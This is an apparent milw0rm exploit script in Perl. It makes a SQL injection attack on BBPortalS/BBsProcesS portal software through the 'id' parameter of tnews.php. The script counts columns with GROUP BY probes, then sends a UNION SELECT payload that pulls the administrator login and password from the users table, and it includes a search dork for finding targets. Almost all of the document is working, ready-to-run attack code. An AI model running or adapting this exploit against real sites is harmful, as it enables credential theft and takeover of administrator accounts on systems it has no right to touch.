#BBPortalS BBsProcesS Remote Blind SQL Injection Exploit #Bug Found And Write By Max007 #Exploit Tested On V.1.5.10 And V.1.6.2 And 1.5.11 #info:For The Version BBPortalS 2.0 name of field is user and password but you have to find name of table #!/usr/bin/perl use LWP::UserAgent; $err=1; $www = new LWP::UserAgent; sub utilisation() { print "\n\tVulnerability Found By Max007 ;)"; print "\n\tBlind SQL Injection In Script BBPortalS / BBsProcesS\n\tDork:\"inurl : tnews.php?op\""; print "\n\tSyntax Exmple: "; print "Exploit.pl http://www.site-vuln.com\n"; exit(0); } sub err() { print "\n this script is not vulnerable !\n"; exit(); } sub table() { print "\n\n \tThis Site Is Vulerable\n \tNumber of Fields : $err\n\tBut You have To Find Name Of Table !\n\tI Don't Have Time To Do This For you hhh ;)\n"; exit(); } if(!$ARGV[0]){utilisation();} $host=$ARGV[0]; sub max007() { $champ="1," x $err; chop($champ); $inject="tnews.php?op=tnews&id=-9/**/group/**/by/**/$err/*"; $sql = "$host/".$inject; print "\n research number of fields .... \n"; $res = $www -> get($sql); if(!($res -> content =~ /Warning/)){ print " The Current number of fields is : $err\n"; $err++; max007(); } else{ if($err==1){ err();} } } if($err==1){ max007();} $err-=1; #system("cls"); print "\nThe number of fields is: $err"; $nbr_champ=$err; $champ="concat(char(117,115,101,114,110,97,109,101,58),login,char(32,32,61,61,61,61,61,32,32,32,112,97,115,115,119,111,114,100,58),pass,char(42,42,42,42,42,42,42,42,42,42,61,61,61,61,61,61,61,61,61,61))," x $nbr_champ; chop($champ); $inject="tnews.php?op=tnews&id=-9/**/union/**/select/**/".$champ."/**/from/**/users/**/where/**/pid=1/*"; $sql = "$host/".$inject; $res = $www -> get($sql) or err(); $i=0;$j=0; $i=index($res->content,'username:'); $j=index($res->content,'**********=========='); $ch=substr($res->content,$i,$j-$i); if($res->content =~ /username/) { print "\n\n Attack successful\n\n"; print "Admin User Name And Password Has Been Found ;)\n\n\t"; print "$ch \n\n"; } else {table();} #Je Suis Triste Vraiment Triste Et Je ne Sais Pas Pourquoi,PourTant je ne dois pas l'ĂȘtre, # milw0rm.com [2007-10-21]